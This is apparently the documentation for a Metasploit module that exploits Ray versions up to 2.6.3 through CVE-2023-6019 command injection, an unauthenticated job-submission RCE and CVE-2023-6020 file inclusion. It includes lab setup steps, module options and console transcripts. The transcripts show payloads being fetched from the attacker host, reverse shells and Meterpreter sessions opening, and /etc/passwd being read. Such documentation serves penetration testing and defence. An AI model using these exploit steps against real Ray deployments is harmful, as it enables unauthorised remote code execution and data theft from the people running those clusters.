## Vulnerable Application Ray (<=v2.6.3) is vulnerable to three vulnerabilities: * RCE via cpu_profile command injection vulnerability (CVE-2023-6019) * RCE via the agent job submission endpoint (No CVE) * local file inclusion (CVE-2023-6020) This module exploits all three vulnerabilities. The vulnerability affects: * Ray (<=v2.6.3) This module was successfully tested on: * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 ### Install and run the vulnerable Ray (v2.6.3) 1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. 2. Install Kali Linux (or other Linux distro) in your virtualization engine. 3. Pull pre-built Ray docker container (v2.6.3) in your VM. `docker pull rayproject/ray:2.6.3` 4. Start the ray container. `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` 5. Start ray. `ray start --head --dashboard-host=0.0.0.0` ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: `use exploit/linux/http/ray_cmdi_rce_lfi` 4. Do: `set rhost ` 5. Optional: `set rport ` 6. Do: `set lhost ` 7. Optional: `set CVE ` 8. Do: `run` 9. You should get a shell or meterpreter ## Options ### ATTACK (required) This is the attack type to use. Default is CMDi(`CVE-2023-6019`). but RCE(No CVE) and LFI(`CVE-2023-6020`) can also be chosen. ### COMMAND (Optional) This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when ATTACK is set to `CMDi` or `RCE`. ### FILEPATH (Optional) This is the file to read. Default is `/etc/passwd`. This is used when ATTACK is set to `LFI`. ## Scenarios ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 0) ``` msf6 > use exploit/linux/http/ray_cmdi_rce_lfi [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019 cve => CVE-2023-6019 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 target => 0 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [+] Grabbed node info, pid: 124, ip: 172.17.0.2 [+] Command execution seems to have been successful. Status code: 500 [*] Using URL: http://192.168.56.1:8080/VvzBBm8 [*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /VvzBBm8 [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (3045380 bytes) to 192.168.56.6 [*] Command Stager progress - 100.00% done (112/112 bytes) [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40554) at 2024-08-05 08:26:42 +0900 [*] Server stopped. meterpreter > sysinfo Computer : 172.17.0.2 OS : Ubuntu 20.04 (Linux 6.6.15-amd64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > ``` ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 1) ``` msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019 cve => CVE-2023-6019 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 target => 1 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp payload => linux/x86/shell/reverse_tcp msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [+] Grabbed node info, pid: 124, ip: 172.17.0.2 [+] Command execution seems to have been successful. Status code: 500 [*] Using URL: http://192.168.56.1:8080/tMBeDO [*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /tMBeDO [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (36 bytes) to 192.168.56.6 [*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:39652) at 2024-08-05 08:28:46 +0900 [*] Command Stager progress - 100.00% done (111/111 bytes) [*] Server stopped. whoami ray pwd /home/ray ``` ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 0) ``` msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE cve => RCE msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 target => 0 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x64/shell/reverse_tcp payload => linux/x64/shell/reverse_tcp msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [+] Command execution successful. Job ID: 'raysubmit_TKeWeJRKQZFkU2zN' Submission ID: 'raysubmit_TKeWeJRKQZFkU2zN' [*] Using URL: http://192.168.56.1:8080/roy19E [*] Command Stager progress - 100.00% done (111/111 bytes) [*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /roy19E [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (38 bytes) to 192.168.56.6 [*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:43312) at 2024-08-05 08:40:06 +0900 [*] Server stopped. whoami ray pwd /home/ray ``` ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 1) ``` msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE cve => RCE msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 target => 1 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp payload => linux/x86/shell/reverse_tcp msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [+] Command execution successful. Job ID: 'raysubmit_g4jZ3U5aQu4gYrFy' Submission ID: 'raysubmit_g4jZ3U5aQu4gYrFy' [*] Using URL: http://192.168.56.1:8080/ZMCKWGQCHh [*] Command Stager progress - 100.00% done (115/115 bytes) [*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /ZMCKWGQCHh [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (36 bytes) to 192.168.56.6 [*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:42666) at 2024-08-05 08:41:22 +0900 [*] Server stopped. whoami ray pwd /home/ray ``` ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6020) ``` msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6020 cve => CVE-2023-6020 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [+] /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin ray:x:1000:100::/home/ray:/bin/bash ```